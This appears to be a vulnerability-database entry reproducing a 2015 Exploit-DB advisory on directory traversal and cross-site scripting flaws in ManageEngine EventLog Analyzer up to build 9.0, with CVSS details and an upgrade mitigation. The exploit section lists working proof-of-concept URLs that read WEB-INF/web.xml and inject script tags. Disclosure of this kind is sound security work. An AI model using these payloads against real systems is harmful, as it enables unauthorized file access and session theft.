ManageEngine EventLog Analyzer Directory Traversal/XSS Vulnerabilities

vendor:

EventLog Analyzer

by:

AmirHadi Yazdani (Sobhansys Co)

7.5

CVSS

HIGH

Directory Traversal/XSS

22 (Path Traversal) and 79 (Cross-site Scripting)

CWE

Product Name: EventLog Analyzer

Affected Version From: <= Build Version 9.0

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: a:manageengine:eventlog_analyzer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2015

ManageEngine EventLog Analyzer Directory Traversal/XSS Vulnerabilities

ManageEngine EventLog Analyzer is vulnerable to directory traversal and XSS attacks. An attacker can exploit this vulnerability to gain access to sensitive files and execute malicious scripts in the user's browser.

Mitigation:

Upgrade to the latest version of ManageEngine EventLog Analyzer and apply the latest security patches.

Source

Exploit-DB raw data:

 ################################################################################################
 #                                                                                              #
 #    ...:::::ManageEngine EventLog Analyzer Directory Traversal/XSS  Vulnerabilities::::....   #         
 # #############################################################################################


                                  Sobhan System Network & Security Group (sobhansys)
								      
-------------------------------------------------------
# Date: 2015-01-24
# Exploit Author: AmirHadi Yazdani (Sobhansys Co)
# Vendor Homepage: http://www.manageengine.com/products/eventlog/
# Demo Link: http://demo.eventloganalyzer.com/event/index3.do
#Affected version: <= Build Version  : 9.0

About ManageEngine EventLog Analyzer (From Vendor Site) :									  
EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market.
Using this Log Analyzer software, organizations can automate 
the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting,
and archiving from one central location. 
This event log analyzer software helps to monitor file integrity, conduct log forensics analysis,
monitor privileged users and comply to different compliance regulatory bodies
by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more.
--------------------------------------------------------

									  
I'M hadihadi From Virangar Security Team

special tnx to:MR.nosrati,black.shadowes,MR.hesy
& all virangar members & all hackerz

greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei

spl:Z.Khodaee

-------
exploit:

Diretory Traversal :

http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=../../WEB-INF/web.xml%3f
http://127.0.0.1/event/index2.do?completeData=true&helpP=archiveAction&tab=system&url=../../WEB-INF/web.xml%3f
http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13&tab=system&url=../../WEB-INF/web.xml%3f

XSS :

http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=userReport'%22()%26%25<ahy><ScRiPt%20>prompt(915375)</ScRiPt>
http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13'%22()%26%25<ahy><ScRiPt%20>prompt(978138)</ScRiPt>&tab=system&url=ConfigureTemplate


----
Sobhan system Co.
Signal Network And Security Group (www.signal-net.net)

E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net